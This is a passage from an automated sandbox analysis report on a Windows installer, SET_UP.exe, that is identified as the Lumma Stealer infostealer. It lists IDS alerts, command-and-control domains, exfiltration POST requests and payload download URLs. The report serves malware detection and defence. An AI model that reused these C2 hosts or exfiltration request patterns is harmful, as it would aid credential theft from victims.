                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 9EB5184Bh0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, ecx0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 9EB5184Bh0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, ecx0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0251DE00
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02526E00
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53BABCE5h0_2_0250EF55
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02528F5E
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-3A6ED29Dh]0_2_0253FF1A
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h0_2_0253AFA0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000C4h]0_2_0252BC16
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_02508D80
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_02508D80
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then lea ecx, dword ptr [esp+00000094h]0_2_02518DB0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.89.250:443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: tentabatte.lat
                      Source: Malware configuration extractorURLs: wordyfindy.lat
                      Source: Malware configuration extractorURLs: talkynicer.lat
                      Source: Malware configuration extractorURLs: manyrestro.lat
                      Source: Malware configuration extractorURLs: laborersquei.click
                      Source: Malware configuration extractorURLs: curverpluch.lat
                      Source: Malware configuration extractorURLs: bashfulacid.lat
                      Source: Malware configuration extractorURLs: slipperyloo.lat
                      Source: Malware configuration extractorURLs: shapestickyr.lat
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.214.186:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.89.250:443
                      Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.214.186:443 -> 192.168.2.4:49744
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: laborersquei.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YOBRJ4S6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18104Host: laborersquei.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UH1202JSAWTJPCRC47VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: laborersquei.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LB6A8ZHZIG3XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: laborersquei.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S3YCAMS19M3HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: laborersquei.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3ZX9UNNKSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1053Host: laborersquei.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: laborersquei.click
                      Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipsyzogey.shop
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipsyzogey.shop
                      Source: global trafficDNS traffic detected: DNS query: laborersquei.click
                      Source: global trafficDNS traffic detected: DNS query: neqi.shop
                      Source: global trafficDNS traffic detected: DNS query: klipsyzogey.shop
                      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
                      Source: SET_UP.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: SET_UP.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: SET_UP.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: SET_UP.exe, 00000000.00000002.2101342719.000000000356A000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2099330277.000000000088C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2091901198.000000000087F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000002.2314319057.00000000012EC000.00000004.00000010.00020000.00000000.sdmp, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: SET_UP.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: SET_UP.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: SET_UP.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000002.2314319057.00000000012EC000.00000004.00000010.00020000.00000000.sdmp, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: SET_UP.exeString found in binary or memory: http://ocsp.digicert.com0A
                      Source: SET_UP.exeString found in binary or memory: http://ocsp.digicert.com0C
                      Source: SET_UP.exeString found in binary or memory: http://ocsp.digicert.com0X
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2353924562.0000000059801000.00000020.00000001.01000000.0000000B.sdmp, is-UIAB4.tmp.7.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: IUService.exe, 00000022.00000002.2326879519.00000000092BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: SET_UP.exeString found in binary or memory: http://www.innosetup.com/
                      Source: SET_UP.exeString found in binary or memory: http://www.remobjects.com/ps
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: SET_UP.exe, 00000000.00000003.1979005683.0000000003990000.00000004.00000800.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000000.2098145757.0000000000321000.00000020.00000001.01000000.00000006.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe.0.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                      Source: SET_UP.exe, 00000000.00000002.2099859671.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipsyzogey.shop/av
                      Source: SET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2091901198.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipsyzogey.shop/int_clp_sha.txt
                      Source: SET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipsyzogey.shop/int_clp_sha.txtG3
                      Source: SET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipsyzogey.shop/int_clp_sha.txtl
                      Source: SET_UP.exe, 00000000.00000003.2091901198.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipsyzogey.shop:443/int_clp_sha.txt
                      Source: SET_UP.exe, 00000000.00000003.1826911184.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1851412519.000000000352C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1827023750.000000000352E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1849198873.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/
                      Source: SET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/.
                      Source: SET_UP.exe, 00000000.00000003.1803136809.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/.we
                      Source: SET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/F
                      Source: SET_UP.exe, 00000000.00000003.1803136809.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/Fx
                      Source: SET_UP.exe, 00000000.00000003.1826848306.0000000003526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/G9udV
                      Source: SET_UP.exe, 00000000.00000003.1849198873.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/N
                      Source: SET_UP.exe, 00000000.00000003.1874088390.000000000352C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/UU8
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1938865603.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2099330277.0000000000881000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1849198873.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1897227227.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1848870428.0000000003524000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803136809.0000000000850000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1898087172.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1873875299.000000000352A000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1849098797.000000000352C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1874088390.000000000352C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1938865603.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826911184.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1851412519.000000000352C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803136809.0000000000844000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1939252128.0000000000877000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1897227227.000000000089E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2091901198.000000000087F000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1898087172.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/api
                      Source: SET_UP.exe, 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/api&
                      Source: SET_UP.exe, 00000000.00000003.1897227227.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/api3
                      Source: SET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1938865603.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/f
                      Source: SET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826911184.00000000008B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/~
                      Source: SET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
                      Source: SET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txt#
                      Source: SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: SET_UP.exe, 00000000.00000003.1804358523.00000000035C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                      Source: SET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: SET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: SET_UP.exe, 00000000.00000003.1804358523.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1827141410.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1804543309.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826974677.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: SET_UP.exe, 00000000.00000003.1804543309.0000000003550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                      Source: SET_UP.exe, 00000000.00000003.1804358523.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1827141410.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1804543309.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826974677.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: SET_UP.exe, 00000000.00000003.1804543309.0000000003550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                      Source: SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2101675445.000000000333F000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2105415101.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000000.2108717164.00000000008C1000.00000020.00000001.01000000.00000007.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000000.2131734150.0000000000B5D000.00000020.00000001.01000000.00000009.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp.4.drString found in binary or memory: https://www.innosetup.com/
                      Source: SET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: SET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: SET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
